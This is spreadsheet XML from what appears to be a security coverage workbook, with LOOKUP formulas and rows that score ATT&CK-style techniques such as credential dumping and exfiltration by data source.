    <row r="252" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A252" s="43" t="s">
        <v>382</v>
      </c>
      <c r="B252" s="45" t="str">
        <f>LOOKUP(A252,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C252" s="17">
        <v>0</v>
      </c>
      <c r="D252" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E252" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F252" s="50"/>
      <c r="G252" s="19"/>
    </row>
    <row r="253" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A253" s="43" t="s">
        <v>383</v>
      </c>
      <c r="B253" s="45" t="str">
        <f>LOOKUP(A253,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C253" s="17">
        <v>0</v>
      </c>
      <c r="D253" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E253" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F253" s="50"/>
      <c r="G253" s="19"/>
    </row>
    <row r="254" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A254" s="43" t="s">
        <v>384</v>
      </c>
      <c r="B254" s="45" t="str">
        <f>LOOKUP(A254,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C254" s="17">
        <v>0</v>
      </c>
      <c r="D254" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E254" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F254" s="50"/>
      <c r="G254" s="19"/>
    </row>
    <row r="255" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A255" s="43" t="s">
        <v>385</v>
      </c>
      <c r="B255" s="45" t="str">
        <f>LOOKUP(A255,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C255" s="17">
        <v>0</v>
      </c>
      <c r="D255" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E255" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F255" s="50"/>
      <c r="G255" s="19"/>
    </row>
    <row r="256" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A256" s="43" t="s">
        <v>386</v>
      </c>
      <c r="B256" s="45" t="str">
        <f>LOOKUP(A256,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C256" s="17">
        <v>0</v>
      </c>
      <c r="D256" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E256" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F256" s="50"/>
      <c r="G256" s="19"/>
    </row>
    <row r="257" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A257" s="43" t="s">
        <v>387</v>
      </c>
      <c r="B257" s="45" t="str">
        <f>LOOKUP(A257,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C257" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D257" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E257" s="45">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F257" s="50"/>
      <c r="G257" s="19"/>
    </row>
    <row r="258" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A258" s="43" t="s">
        <v>388</v>
      </c>
      <c r="B258" s="45" t="str">
        <f>LOOKUP(A258,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C258" s="17">
        <v>0</v>
      </c>
      <c r="D258" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E258" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F258" s="50"/>
      <c r="G258" s="19"/>
    </row>
    <row r="259" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A259" s="43" t="s">
        <v>389</v>
      </c>
      <c r="B259" s="45" t="str">
        <f>LOOKUP(A259,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C259" s="17">
        <v>0</v>
      </c>
      <c r="D259" s="45">
        <f t="shared" ref="D259:D267" si="9">LEN(TRIM(B259))-LEN(SUBSTITUTE(TRIM(B259),",",""))+1</f>
        <v>1</v>
      </c>
      <c r="E259" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F259" s="50"/>
      <c r="G259" s="19"/>
    </row>
    <row r="260" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A260" s="43" t="s">
        <v>390</v>
      </c>
      <c r="B260" s="45" t="str">
        <f>LOOKUP(A260,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C260" s="17">
        <v>0</v>
      </c>
      <c r="D260" s="45">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="E260" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F260" s="50"/>
      <c r="G260" s="19"/>
    </row>
    <row r="261" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A261" s="43" t="s">
        <v>391</v>
      </c>
      <c r="B261" s="45" t="str">
        <f>LOOKUP(A261,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C261" s="17">
        <v>0</v>
      </c>
      <c r="D261" s="45">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="E261" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F261" s="50"/>
      <c r="G261" s="19"/>
    </row>
    <row r="262" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A262" s="43" t="s">
        <v>392</v>
      </c>
      <c r="B262" s="45" t="str">
        <f>LOOKUP(A262,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C262" s="17">
        <v>0</v>
      </c>
      <c r="D262" s="45">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="E262" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F262" s="50"/>
      <c r="G262" s="19"/>
    </row>
    <row r="263" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A263" s="43" t="s">
        <v>393</v>
      </c>
      <c r="B263" s="45" t="str">
        <f>LOOKUP(A263,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C263" s="17">
        <v>0</v>
      </c>
      <c r="D263" s="45">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="E263" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F263" s="50"/>
      <c r="G263" s="19"/>
    </row>
    <row r="264" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A264" s="43" t="s">
        <v>394</v>
      </c>
      <c r="B264" s="45" t="str">
        <f>LOOKUP(A264,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C264" s="17">
        <v>0</v>
      </c>
      <c r="D264" s="45">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="E264" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F264" s="50"/>
      <c r="G264" s="19"/>
    </row>
    <row r="265" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A265" s="43" t="s">
        <v>396</v>
      </c>
      <c r="B265" s="45" t="str">
        <f>LOOKUP(A265,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C265" s="17">
        <v>0</v>
      </c>
      <c r="D265" s="45">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="E265" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F265" s="50"/>
      <c r="G265" s="19"/>
    </row>
    <row r="266" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A266" s="43" t="s">
        <v>397</v>
      </c>
      <c r="B266" s="45" t="str">
        <f>LOOKUP(A266,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C266" s="17">
        <v>0</v>
      </c>
      <c r="D266" s="45">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="E266" s="45">
        <f t="shared" ref="E266:E267" si="10">LEN(TRIM(C266))-LEN(SUBSTITUTE(TRIM(C266),";",""))+1</f>
        <v>1</v>
      </c>
      <c r="F266" s="50"/>
      <c r="G266" s="19"/>
    </row>
    <row r="267" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A267" s="43" t="s">
        <v>399</v>
      </c>
      <c r="B267" s="45" t="str">
        <f>LOOKUP(A267,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C267" s="17">
        <v>0</v>
      </c>
      <c r="D267" s="45">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="E267" s="45">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="F267" s="50"/>
      <c r="G267" s="19"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="G2">
    <cfRule type="iconSet" priority="1">
      <iconSet iconSet="3Symbols2" reverse="1">
        <cfvo type="percent" val="0"/>
        <cfvo type="num" val="0" gte="0"/>
        <cfvo type="num" val="0" gte="0"/>
      </iconSet>
    </cfRule>
  </conditionalFormatting>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9"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A42E9-E42C-4496-BDC3-EB50FDD46582}">
  <dimension ref="A1:Z431"/>
  <sheetViews>
    <sheetView zoomScale="150" zoomScaleNormal="150" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A236" activePane="bottomLeft" state="frozen"/>
      <selection activeCell="C246" sqref="C246:C1048576"/>
      <selection pane="bottomLeft" activeCell="E267" sqref="E267"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="15" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="9.5" customWidth="1"/>
    <col min="2" max="2" width="39.5" customWidth="1"/>
    <col min="3" max="3" width="65.33203125" customWidth="1"/>
    <col min="4" max="6" width="20.6640625" style="2" customWidth="1"/>
    <col min="7" max="7" width="32.5" style="1" customWidth="1"/>
    <col min="8" max="26" width="9.1640625" style="3" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="33" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A1" s="42" t="s">
        <v>37</v>
      </c>
      <c r="B1" s="42" t="s">
        <v>406</v>
      </c>
      <c r="C1" s="28" t="s">
        <v>407</v>
      </c>
      <c r="D1" s="52" t="s">
        <v>408</v>
      </c>
      <c r="E1" s="44" t="s">
        <v>409</v>
      </c>
      <c r="F1" s="44" t="s">
        <v>410</v>
      </c>
      <c r="G1" s="31" t="s">
        <v>5</v>
      </c>
      <c r="H1" s="42"/>
    </row>
    <row r="2" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A2" s="43" t="s">
        <v>44</v>
      </c>
      <c r="B2" s="41" t="str">
        <f>LOOKUP(A2,'REF-DataSources'!A:B)</f>
        <v>Data Obfuscation</v>
      </c>
      <c r="C2" s="45" t="s">
        <v>534</v>
      </c>
      <c r="D2" s="14">
        <v>3</v>
      </c>
      <c r="E2" s="14">
        <v>3</v>
      </c>
      <c r="F2" s="14">
        <v>4</v>
      </c>
      <c r="G2" s="32">
        <f>((D2*2)+(E2*2)+F2)/5</f>
        <v>3.2</v>
      </c>
    </row>
    <row r="3" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A3" s="43" t="s">
        <v>46</v>
      </c>
      <c r="B3" s="41" t="str">
        <f>LOOKUP(A3,'REF-DataSources'!A:B)</f>
        <v>Protocol Impersonation</v>
      </c>
      <c r="C3" s="45" t="s">
        <v>3029</v>
      </c>
      <c r="D3" s="14">
        <v>3</v>
      </c>
      <c r="E3" s="14">
        <v>4</v>
      </c>
      <c r="F3" s="14">
        <v>4</v>
      </c>
      <c r="G3" s="32">
        <f t="shared" ref="G3:G66" si="0">((D3*2)+(E3*2)+F3)/5</f>
        <v>3.6</v>
      </c>
    </row>
    <row r="4" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A4" s="43" t="s">
        <v>48</v>
      </c>
      <c r="B4" s="41" t="str">
        <f>LOOKUP(A4,'REF-DataSources'!A:B)</f>
        <v>OS Credential Dumping</v>
      </c>
      <c r="C4" s="45" t="s">
        <v>552</v>
      </c>
      <c r="D4" s="14">
        <v>4</v>
      </c>
      <c r="E4" s="14">
        <v>4</v>
      </c>
      <c r="F4" s="14">
        <v>4</v>
      </c>
      <c r="G4" s="32">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
    </row>
    <row r="5" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A5" s="43" t="s">
        <v>49</v>
      </c>
      <c r="B5" s="41" t="str">
        <f>LOOKUP(A5,'REF-DataSources'!A:B)</f>
        <v>/etc/passwd and /etc/shadow</v>
      </c>
      <c r="C5" s="45" t="s">
        <v>2029</v>
      </c>
      <c r="D5" s="14">
        <v>4</v>
      </c>
      <c r="E5" s="14">
        <v>5</v>
      </c>
      <c r="F5" s="14">
        <v>5</v>
      </c>
      <c r="G5" s="32">
        <f t="shared" si="0"/>
        <v>4.5999999999999996</v>
      </c>
    </row>
    <row r="6" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A6" s="43" t="s">
        <v>51</v>
      </c>
      <c r="B6" s="41" t="str">
        <f>LOOKUP(A6,'REF-DataSources'!A:B)</f>
        <v>Data from Local System</v>
      </c>
      <c r="C6" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D6" s="14">
        <v>2</v>
      </c>
      <c r="E6" s="14">
        <v>4</v>
      </c>
      <c r="F6" s="14">
        <v>4</v>
      </c>
      <c r="G6" s="32">
        <f t="shared" si="0"/>
        <v>3.2</v>
      </c>
    </row>
    <row r="7" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A7" s="43" t="s">
        <v>53</v>
      </c>
      <c r="B7" s="41" t="str">
        <f>LOOKUP(A7,'REF-DataSources'!A:B)</f>
        <v>Direct Volume Access</v>
      </c>
      <c r="C7" s="45" t="s">
        <v>603</v>
      </c>
      <c r="D7" s="14">
        <v>0</v>
      </c>
      <c r="E7" s="14">
        <v>0</v>
      </c>
      <c r="F7" s="14">
        <v>1</v>
      </c>
      <c r="G7" s="32">
        <f t="shared" si="0"/>
        <v>0.2</v>
      </c>
    </row>
    <row r="8" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A8" s="43" t="s">
        <v>54</v>
      </c>
      <c r="B8" s="41" t="str">
        <f>LOOKUP(A8,'REF-DataSources'!A:B)</f>
        <v>System Service Discovery</v>
      </c>
      <c r="C8" s="45" t="s">
        <v>609</v>
      </c>
      <c r="D8" s="14">
        <v>4</v>
      </c>
      <c r="E8" s="14">
        <v>5</v>
      </c>
      <c r="F8" s="14">
        <v>5</v>
      </c>
      <c r="G8" s="32">
        <f t="shared" si="0"/>
        <v>4.5999999999999996</v>
      </c>
    </row>
    <row r="9" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A9" s="43" t="s">
        <v>56</v>
      </c>
      <c r="B9" s="41" t="str">
        <f>LOOKUP(A9,'REF-DataSources'!A:B)</f>
        <v>Fallback Channels</v>
      </c>
      <c r="C9" s="45" t="s">
        <v>614</v>
      </c>
      <c r="D9" s="14">
        <v>2</v>
      </c>
      <c r="E9" s="14">
        <v>3</v>
      </c>
      <c r="F9" s="14">
        <v>4</v>
      </c>
      <c r="G9" s="32">
        <f t="shared" si="0"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="10" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A10" s="43" t="s">
        <v>58</v>
      </c>
      <c r="B10" s="41" t="str">
        <f>LOOKUP(A10,'REF-DataSources'!A:B)</f>
        <v>Fallback Channels</v>
      </c>
      <c r="C10" s="45" t="s">
        <v>3030</v>
      </c>
      <c r="D10" s="14">
        <v>1</v>
      </c>
      <c r="E10" s="14">
        <v>3</v>
      </c>
      <c r="F10" s="14">
        <v>4</v>
      </c>
      <c r="G10" s="32">
        <f t="shared" si="0"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="11" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A11" s="43" t="s">
        <v>60</v>
      </c>
      <c r="B11" s="41" t="str">
        <f>LOOKUP(A11,'REF-DataSources'!A:B)</f>
        <v>Application Window Discovery</v>
      </c>
      <c r="C11" s="45" t="s">
        <v>617</v>
      </c>
      <c r="D11" s="14">
        <v>1</v>
      </c>
      <c r="E11" s="14">
        <v>2</v>
      </c>
      <c r="F11" s="14">
        <v>2</v>
      </c>
      <c r="G11" s="32">
        <f t="shared" si="0"/>
        <v>1.6</v>
      </c>
    </row>
    <row r="12" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A12" s="43" t="s">
        <v>62</v>
      </c>
      <c r="B12" s="41" t="str">
        <f>LOOKUP(A12,'REF-DataSources'!A:B)</f>
        <v>Exfiltration Over Other Network Medium</v>
      </c>
      <c r="C12" s="45" t="s">
        <v>622</v>
      </c>
      <c r="D12" s="14">
        <v>1</v>
      </c>
      <c r="E12" s="14">
        <v>2</v>
      </c>
      <c r="F12" s="14">
        <v>3</v>
      </c>
      <c r="G12" s="32">
        <f t="shared" si="0"/>
        <v>1.8</v>
      </c>
    </row>
    <row r="13" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A13" s="43" t="s">
        <v>64</v>
      </c>
      <c r="B13" s="41" t="str">
        <f>LOOKUP(A13,'REF-DataSources'!A:B)</f>
        <v>Query Registry</v>
      </c>
      <c r="C13" s="45" t="s">
        <v>631</v>
      </c>
      <c r="D13" s="14">
        <v>4</v>
      </c>
      <c r="E13" s="14">
        <v>4</v>
      </c>
      <c r="F13" s="14">
        <v>4</v>
      </c>
      <c r="G13" s="32">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
    </row>
    <row r="14" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A14" s="43" t="s">
        <v>66</v>
      </c>
      <c r="B14" s="41" t="str">
        <f>LOOKUP(A14,'REF-DataSources'!A:B)</f>
        <v>Query Registry</v>
      </c>
      <c r="C14" s="45" t="s">
        <v>2055</v>
      </c>
      <c r="D14" s="14">
        <v>1</v>
      </c>
      <c r="E14" s="14">
        <v>3</v>
      </c>
      <c r="F14" s="14">
        <v>4</v>
      </c>
      <c r="G14" s="32">
        <f t="shared" si="0"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="15" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A15" s="43" t="s">
        <v>68</v>
      </c>
      <c r="B15" s="41" t="str">
        <f>LOOKUP(A15,'REF-DataSources'!A:B)</f>
        <v>Rootkit</v>
      </c>
      <c r="C15" s="45" t="s">
        <v>635</v>
      </c>
      <c r="D15" s="14">
        <v>0</v>
      </c>
      <c r="E15" s="14">
        <v>1</v>
      </c>
      <c r="F15" s="14">
        <v>4</v>
      </c>
      <c r="G15" s="32">
        <f t="shared" si="0"/>
        <v>1.2</v>
      </c>
    </row>
    <row r="16" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A16" s="43" t="s">
        <v>70</v>
      </c>
      <c r="B16" s="41" t="str">
        <f>LOOKUP(A16,'REF-DataSources'!A:B)</f>
        <v>Rootkit</v>
      </c>
      <c r="C16" s="45" t="s">
        <v>2029</v>
      </c>
      <c r="D16" s="14">
        <v>3</v>
      </c>
      <c r="E16" s="14">
        <v>4</v>
      </c>
      <c r="F16" s="14">
        <v>4</v>
      </c>
      <c r="G16" s="32">
        <f t="shared" si="0"/>
        <v>3.6</v>
      </c>
    </row>
    <row r="17" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A17" s="43" t="s">
        <v>72</v>
      </c>
      <c r="B17" s="41" t="str">
        <f>LOOKUP(A17,'REF-DataSources'!A:B)</f>
        <v>System Network Configuration Discovery</v>
      </c>
      <c r="C17" s="45" t="s">
        <v>609</v>
      </c>
      <c r="D17" s="14">
        <v>3</v>
      </c>
      <c r="E17" s="14">
        <v>4</v>
      </c>
      <c r="F17" s="14">
        <v>4</v>
      </c>
      <c r="G17" s="32">
        <f t="shared" si="0"/>
        <v>3.6</v>
      </c>
    </row>
    <row r="18" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A18" s="43" t="s">
        <v>73</v>
      </c>
      <c r="B18" s="41" t="str">
        <f>LOOKUP(A18,'REF-DataSources'!A:B)</f>
        <v>System Network Configuration Discovery</v>
      </c>
      <c r="C18" s="45" t="s">
        <v>3031</v>
      </c>
      <c r="D18" s="14">
        <v>2</v>
      </c>
      <c r="E18" s="14">
        <v>4</v>
      </c>
      <c r="F18" s="14">
        <v>4</v>
      </c>
      <c r="G18" s="32">
        <f t="shared" si="0"/>
        <v>3.2</v>
      </c>
    </row>
    <row r="19" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A19" s="43" t="s">
        <v>75</v>
      </c>
      <c r="B19" s="41" t="str">
        <f>LOOKUP(A19,'REF-DataSources'!A:B)</f>
        <v>Remote System Discovery</v>
      </c>
      <c r="C19" s="45" t="s">
        <v>643</v>
      </c>
      <c r="D19" s="14">
        <v>3</v>
      </c>
      <c r="E19" s="14">
        <v>4</v>
      </c>
      <c r="F19" s="14">
        <v>4</v>
      </c>
      <c r="G19" s="32">
        <f t="shared" si="0"/>
        <v>3.6</v>
      </c>
    </row>
    <row r="20" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A20" s="43" t="s">
        <v>77</v>
      </c>
      <c r="B20" s="41" t="str">
        <f>LOOKUP(A20,'REF-DataSources'!A:B)</f>
        <v>Remote System Discovery</v>
      </c>
      <c r="C20" s="45" t="s">
        <v>3032</v>
      </c>
      <c r="D20" s="14">
        <v>0</v>
      </c>
      <c r="E20" s="14">
        <v>1</v>
      </c>
      <c r="F20" s="14">
        <v>3</v>
      </c>
      <c r="G20" s="32">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
    </row>
    <row r="21" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A21" s="43" t="s">
        <v>79</v>
      </c>
      <c r="B21" s="41" t="str">
        <f>LOOKUP(A21,'REF-DataSources'!A:B)</f>
        <v>Automated Exfiltration</v>
      </c>
      <c r="C21" s="45" t="s">
        <v>647</v>
      </c>
      <c r="D21" s="14">
        <v>1</v>
      </c>
      <c r="E21" s="14">
        <v>3</v>
      </c>
      <c r="F21" s="14">
        <v>4</v>
      </c>
      <c r="G21" s="32">
        <f t="shared" si="0"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="22" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A22" s="43" t="s">
        <v>80</v>
      </c>
      <c r="B22" s="41" t="str">
        <f>LOOKUP(A22,'REF-DataSources'!A:B)</f>
        <v>Remote Services</v>
      </c>
      <c r="C22" s="45" t="s">
        <v>1139</v>
      </c>
      <c r="D22" s="14">
        <v>2</v>
      </c>
      <c r="E22" s="14">
        <v>3</v>
      </c>
      <c r="F22" s="14">
        <v>4</v>
      </c>
      <c r="G22" s="32">
        <f t="shared" si="0"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="23" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A23" s="43" t="s">
        <v>81</v>
      </c>
      <c r="B23" s="41" t="str">
        <f>LOOKUP(A23,'REF-DataSources'!A:B)</f>
        <v>Windows Remote Management</v>
      </c>
      <c r="C23" s="45" t="s">
        <v>763</v>
      </c>
      <c r="D23" s="14">
        <v>1</v>
      </c>
      <c r="E23" s="14">
        <v>3</v>
      </c>
      <c r="F23" s="14">
        <v>5</v>
      </c>
      <c r="G23" s="32">
        <f t="shared" si="0"/>
        <v>2.6</v>
      </c>
    </row>
    <row r="24" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A24" s="43" t="s">
        <v>83</v>
      </c>
      <c r="B24" s="41" t="str">
        <f>LOOKUP(A24,'REF-DataSources'!A:B)</f>
        <v>Windows Remote Management</v>
      </c>
      <c r="C24" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D24" s="14">
        <v>2</v>
      </c>
      <c r="E24" s="14">
        <v>4</v>
      </c>
      <c r="F24" s="14">
        <v>5</v>
      </c>
      <c r="G24" s="32">
        <f t="shared" si="0"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="25" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A25" s="43" t="s">
        <v>84</v>
      </c>
      <c r="B25" s="41" t="str">
        <f>LOOKUP(A25,'REF-DataSources'!A:B)</f>
        <v>Windows Remote Management</v>
      </c>
      <c r="C25" s="45" t="s">
        <v>697</v>
      </c>
      <c r="D25" s="14">
        <v>1</v>
      </c>
      <c r="E25" s="14">
        <v>3</v>
      </c>
      <c r="F25" s="14">
        <v>4</v>
      </c>
      <c r="G25" s="32">
        <f t="shared" si="0"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="26" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A26" s="43" t="s">
        <v>85</v>
      </c>
      <c r="B26" s="41" t="str">
        <f>LOOKUP(A26,'REF-DataSources'!A:B)</f>
        <v>Data from Removable Media</v>
      </c>
      <c r="C26" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D26" s="14">
        <v>1</v>
      </c>
      <c r="E26" s="14">
        <v>2</v>
      </c>
      <c r="F26" s="14">
        <v>3</v>
      </c>
      <c r="G26" s="32">
        <f t="shared" si="0"/>
        <v>1.8</v>
      </c>
    </row>
    <row r="27" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A27" s="43" t="s">
        <v>86</v>
      </c>
      <c r="B27" s="41" t="str">
        <f>LOOKUP(A27,'REF-DataSources'!A:B)</f>
        <v>Multiband Communication</v>
      </c>
      <c r="C27" s="45" t="s">
        <v>697</v>
      </c>
      <c r="D27" s="14">
        <v>1</v>
      </c>
      <c r="E27" s="14">
        <v>3</v>
      </c>
      <c r="F27" s="14">
        <v>4</v>
      </c>
      <c r="G27" s="32">
        <f t="shared" si="0"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="28" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A28" s="43" t="s">
        <v>87</v>
      </c>
      <c r="B28" s="41" t="str">
        <f>LOOKUP(A28,'REF-DataSources'!A:B)</f>
        <v>Obfuscated Files or Information</v>
      </c>
      <c r="C28" s="45" t="s">
        <v>701</v>
      </c>
      <c r="D28" s="14">
        <v>1</v>
      </c>
      <c r="E28" s="14">
        <v>2</v>
      </c>
      <c r="F28" s="14">
        <v>4</v>
      </c>
      <c r="G28" s="32">
        <f t="shared" si="0"/>
        <v>2</v>
      </c>
    </row>
    <row r="29" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A29" s="43" t="s">
        <v>89</v>
      </c>
      <c r="B29" s="41" t="str">
        <f>LOOKUP(A29,'REF-DataSources'!A:B)</f>
        <v>Indicator Removal from Tools</v>
      </c>
      <c r="C29" s="45" t="s">
        <v>3033</v>
      </c>
      <c r="D29" s="14">
        <v>4</v>
      </c>
      <c r="E29" s="14">
        <v>4</v>
      </c>
      <c r="F29" s="14">
        <v>5</v>
      </c>
      <c r="G29" s="32">
        <f t="shared" si="0"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="30" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A30" s="43" t="s">
        <v>91</v>
      </c>
      <c r="B30" s="41" t="str">
        <f>LOOKUP(A30,'REF-DataSources'!A:B)</f>
        <v>Scheduled Transfer</v>
      </c>
      <c r="C30" s="45" t="s">
        <v>733</v>
      </c>
      <c r="D30" s="14">
        <v>2</v>
      </c>
      <c r="E30" s="14">
        <v>3</v>
      </c>
      <c r="F30" s="14">
        <v>5</v>
      </c>
      <c r="G30" s="32">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
    </row>
    <row r="31" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A31" s="43" t="s">
        <v>92</v>
      </c>
      <c r="B31" s="41" t="str">
        <f>LOOKUP(A31,'REF-DataSources'!A:B)</f>
        <v>Data Transfer Size Limits</v>
      </c>
      <c r="C31" s="45" t="s">
        <v>737</v>
      </c>
      <c r="D31" s="14">
        <v>1</v>
      </c>
      <c r="E31" s="14">
        <v>2</v>
      </c>
      <c r="F31" s="14">
        <v>3</v>
      </c>
      <c r="G31" s="32">
        <f t="shared" si="0"/>
        <v>1.8</v>
      </c>
    </row>
    <row r="32" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A32" s="43" t="s">
        <v>94</v>
      </c>
      <c r="B32" s="41" t="str">
        <f>LOOKUP(A32,'REF-DataSources'!A:B)</f>
        <v>Data Transfer Size Limits</v>
      </c>
      <c r="C32" s="45" t="s">
        <v>2563</v>
      </c>
      <c r="D32" s="14">
        <v>3</v>
      </c>
      <c r="E32" s="14">
        <v>4</v>
      </c>
      <c r="F32" s="14">
        <v>5</v>
      </c>
      <c r="G32" s="32">
        <f t="shared" si="0"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="33" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A33" s="43" t="s">
        <v>96</v>
      </c>
      <c r="B33" s="41" t="str">
        <f>LOOKUP(A33,'REF-DataSources'!A:B)</f>
        <v>Data Transfer Size Limits</v>
      </c>
      <c r="C33" s="45" t="s">
        <v>3034</v>
      </c>
      <c r="D33" s="14">
        <v>1</v>
      </c>
      <c r="E33" s="14">
        <v>2</v>
      </c>
      <c r="F33" s="14">
        <v>3</v>
      </c>
      <c r="G33" s="32">
        <f t="shared" si="0"/>
        <v>1.8</v>
      </c>
    </row>
    <row r="34" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A34" s="43" t="s">
        <v>98</v>
      </c>
      <c r="B34" s="41" t="str">
        <f>LOOKUP(A34,'REF-DataSources'!A:B)</f>
        <v>System Owner/User Discovery</v>
      </c>
      <c r="C34" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D34" s="14">
        <v>4</v>
      </c>
      <c r="E34" s="14">
        <v>4</v>
      </c>
      <c r="F34" s="14">
